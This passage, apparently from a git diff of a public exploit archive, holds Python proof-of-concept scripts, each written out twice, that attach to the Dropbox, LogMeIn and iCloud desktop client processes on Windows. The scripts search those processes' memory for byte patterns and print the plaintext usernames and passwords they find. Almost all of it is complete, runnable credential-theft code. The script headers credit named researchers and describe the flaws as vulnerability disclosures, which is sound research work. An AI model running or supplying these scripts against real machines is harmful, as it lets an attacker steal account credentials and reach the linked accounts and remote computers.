debug.system.find_processes_by_filename(filename): - process_pid = process.get_pid() - if process_pid is not 0: - print "[+] Found process with pid #%d" % (process_pid) - time.sleep(1) - print "[~] Trying to read memory for pid #%d" % (process_pid) - - process = Process(process_pid) - for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'): - memory_dump.append(process.read(address,100)) - for i in range(len(memory_dump)): - email_addr = memory_dump[i].split('email=')[1] - tmp_passwd = memory_dump[i].split('password=')[1] - username = email_addr.split('\x00')[0] - password = tmp_passwd.split('&is_sso_link=')[0] - if username != '' and password !='': - found = 1 - print "[+] Credentials found!\r\n----------------------------------------" - print "[+] Username: %s" % urllib.unquote_plus(username) - print "[+] Password: %s" % password - if found == 0: - print "[-] Credentials not found! Make sure the client is connected." - else: - print "[-] No process found with name '%s'." % (filename) - - debug.loop() -finally: - debug.stop() - - - -###################################################################### - -##### -# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure -# Tested on Windows Windows Server 2012 R2 64bit, English -# Vendor Homepage @ https://secure.logmein.com/home/en -# Date 06/09/2016 -# Bug Discovery by: -# -# Alexander Korznikov (https://www.linkedin.com/in/nopernik) -# http://korznikov.com/ -# -# Viktor Minin (https://www.linkedin.com/in/MininViktor) -# https://1-33-7.com/ -# -# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) -# http://www.black-rose.ml -# -##### -# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. -# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers. -##### -# Proof-Of-Concept Code: - -import time -import urllib -from winappdbg import Debug, Process - -username = '' -password = '' -found = 0 -filename = "LMIIgnition.exe" -process_pid = 0 -memory_dump = [] - -debug = Debug() -try: - print "[~] Searching for pid by process name '%s'.." % (filename) - time.sleep(1) - debug.system.scan_processes() - for (process, process_name) in debug.system.find_processes_by_filename(filename): - process_pid = process.get_pid() - if process_pid is not 0: - print "[+] Found process with pid #%d" % (process_pid) - time.sleep(1) - print "[~] Trying to read memory for pid #%d" % (process_pid) - - process = Process(process_pid) - for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'): - memory_dump.append(process.read(address,150)) - for i in range(len(memory_dump[0])): - email_addr = memory_dump[i].split('email=')[1] - tmp_passwd = memory_dump[i].split('password=')[1] - username = email_addr.split('&hiddenEmail=')[0] - password = tmp_passwd.split('&rememberMe=')[0] - if username != '' and password !='': - found = 1 - print "[+] Credentials found!\r\n----------------------------------------" - print "[+] Username: %s" % urllib.unquote_plus(username) - print "[+] Password: %s" % password - break - if found == 0: - print "[-] Credentials not found! Make sure the client is connected." - else: - print "[-] No process found with name '%s'." % (filename) - - debug.loop() -finally: - debug.stop() - - - -###################################################################### - -##### -# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit -# Tested on Windows Windows 7 64bit, English -# Vendor Homepage @ https://www.apple.com/ -# Product Homepage @ https://support.apple.com/en-us/HT204283 -# Date 07/09/2016 -# Bug Discovery by: -# -# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) -# http://www.black-rose.ml -# -# Viktor Minin (https://www.linkedin.com/in/MininViktor) -# https://1-33-7.com/ -# -# Alexander Korznikov (https://www.linkedin.com/in/nopernik) -# http://korznikov.com/ -# -##### -# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out. -# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process. -# Funny eh?! -# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account. -# -# Authors are not responsible for any misuse or demage which caused by use of this script code. -# Please use responsibly. -##### -# Proof-Of-Concept Code: - -import time -import urllib -from winappdbg import Debug, Process - -def b2h(str): - return ''.join(["%02X " % ord(x) for x in str]).strip() - -def h2b(str): - bytes = [] - str = ''.join(str.split(" ")) - for i in range(0, len(str), 2): - bytes.append(chr(int(str[i:i+2], 16))) - return ''.join(bytes) - -usr = '' -pwd = '' -found = 0 -filename = "iCloud.exe" -process_pid = 0 -memory_dump = [] - -debug = Debug() -try: - print "#########################################################################" - print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#" - print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#" - print "#\t\tTested on Windows Windows 7 64bit, English\t\t#" - print "#\t\t\tPlease use responsibly.\t\t\t\t#" - print "#########################################################################\r\n" - print "[~] Searching for pid by process name '%s'.." % (filename) - time.sleep(1) - debug.system.scan_processes() - for (process, process_name) in debug.system.find_processes_by_filename(filename): - process_pid = process.get_pid() - if process_pid is not 0: - print "[+] Found process with pid #%d" % (process_pid) - time.sleep(1) - print "[~] Trying to read memory for pid #%d" % (process_pid) - - process = Process(process_pid) - for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'): - memory_dump.append(process.read(address,50)) - - try: - str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1] - usr = h2b(str.split(' 00')[0]) - except: - pass - - memory_dump = [] - for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'): - memory_dump.append(process.read(address,60)) - try: - str = b2h(memory_dump[0]).split('07 00 02 09')[1] - pwd = h2b(str.split(' 00')[0]) - except: - pass - - if usr != '' and pwd !='': - found = 1 - print "[+] iCloud Credentials found!\r\n----------------------------------------" - print "[+] Username: %s" % usr - print "[+] Password: %s" % pwd - if found == 0: - print "[-] Credentials not found!" - else: - print "[-] No process found with name '%s'." % (filename) - - debug.loop() -finally: - debug.stop() diff --git a/platforms/windows/local/40348.py b/platforms/windows/local/40348.py new file mode 100755 index 000000000..d5faf1120 --- /dev/null +++ b/platforms/windows/local/40348.py @@ -0,0 +1,66 @@ +##### +# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure +# Tested on Windows Windows Server 2012 R2 64bit, English +# Vendor Homepage @ https://www.dropbox.com +# Date 06/09/2016 +# Bug Discovery by: +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +##### +# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. +# A potential attacker could reveal the supplied username and password in order to gain access to account. +##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +username = '' +password = '' +found = 0 +filename = "Dropbox.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'): + memory_dump.append(process.read(address,100)) + for i in range(len(memory_dump)): + email_addr = memory_dump[i].split('email=')[1] + tmp_passwd = memory_dump[i].split('password=')[1] + username = email_addr.split('\x00')[0] + password = tmp_passwd.split('&is_sso_link=')[0] + if username != '' and password !='': + found = 1 + print "[+] Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % urllib.unquote_plus(username) + print "[+] Password: %s" % password + if found == 0: + print "[-] Credentials not found! Make sure the client is connected." + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() \ No newline at end of file diff --git a/platforms/windows/local/40349.py b/platforms/windows/local/40349.py new file mode 100755 index 000000000..c2f25fede --- /dev/null +++ b/platforms/windows/local/40349.py @@ -0,0 +1,67 @@ +##### +# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure +# Tested on Windows Windows Server 2012 R2 64bit, English +# Vendor Homepage @ https://secure.logmein.com/home/en +# Date 06/09/2016 +# Bug Discovery by: +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +##### +# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. +# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers. +##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +username = '' +password = '' +found = 0 +filename = "LMIIgnition.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'): + memory_dump.append(process.read(address,150)) + for i in range(len(memory_dump[0])): + email_addr = memory_dump[i].split('email=')[1] + tmp_passwd = memory_dump[i].split('password=')[1] + username = email_addr.split('&hiddenEmail=')[0] + password = tmp_passwd.split('&rememberMe=')[0] + if username != '' and password !='': + found = 1 + print "[+] Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % urllib.unquote_plus(username) + print "[+] Password: %s" % password + break + if found == 0: + print "[-] Credentials not found! Make sure the client is connected." + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() \ No newline at end of file diff --git a/platforms/windows/local/40350.py b/platforms/windows/local/40350.py new file mode 100755 index 000000000..5a5f66fbe --- /dev/null +++ b/platforms/windows/local/40350.py @@ -0,0 +1,99 @@ +##### +# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit +# Tested on Windows Windows 7 64bit, English +# Vendor Homepage @ https://www.apple.com/ +# Product Homepage @ https://support.apple.com/en-us/HT204283 +# Date 07/09/2016 +# Bug Discovery by: +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +##### +# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out. +# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process. +# Funny eh?! +# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account. +# +# Authors are not responsible for any misuse or demage which caused by use of this script code. +# Please use responsibly. +##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +def b2h(str): + return ''.join(["%02X " % ord(x) for x in str]).strip() + +def h2b(str): + bytes = [] + str = ''.join(str.split(" ")) + for i in range(0, len(str), 2): + bytes.append(chr(int(str[i:i+2], 16))) + return ''.join(bytes) + +usr = '' +pwd = '' +found = 0 +filename = "iCloud.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "#########################################################################" + print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#" + print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#" + print "#\t\tTested on Windows Windows 7 64bit, English\t\t#" + print "#\t\t\tPlease use responsibly.\t\t\t\t#" + print "#########################################################################\r\n" + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'): + memory_dump.append(process.read(address,50)) + + try: + str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1] + usr = h2b(str.split(' 00')[0]) + except: + pass + + memory_dump = [] + for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'): + memory_dump.append(process.read(address,60)) + try: + str = b2h(memory_dump[0]).split('07 00 02 09')[1] + pwd = h2b(str.split(' 00')[0]) + except: + pass + + if usr != '' and pwd !='': + found = 1 + print "[+] iCloud Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % usr + print "[+] Password: %s" % pwd + if found == 0: + print "[-] Credentials not found!" + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() \ No newline at end of file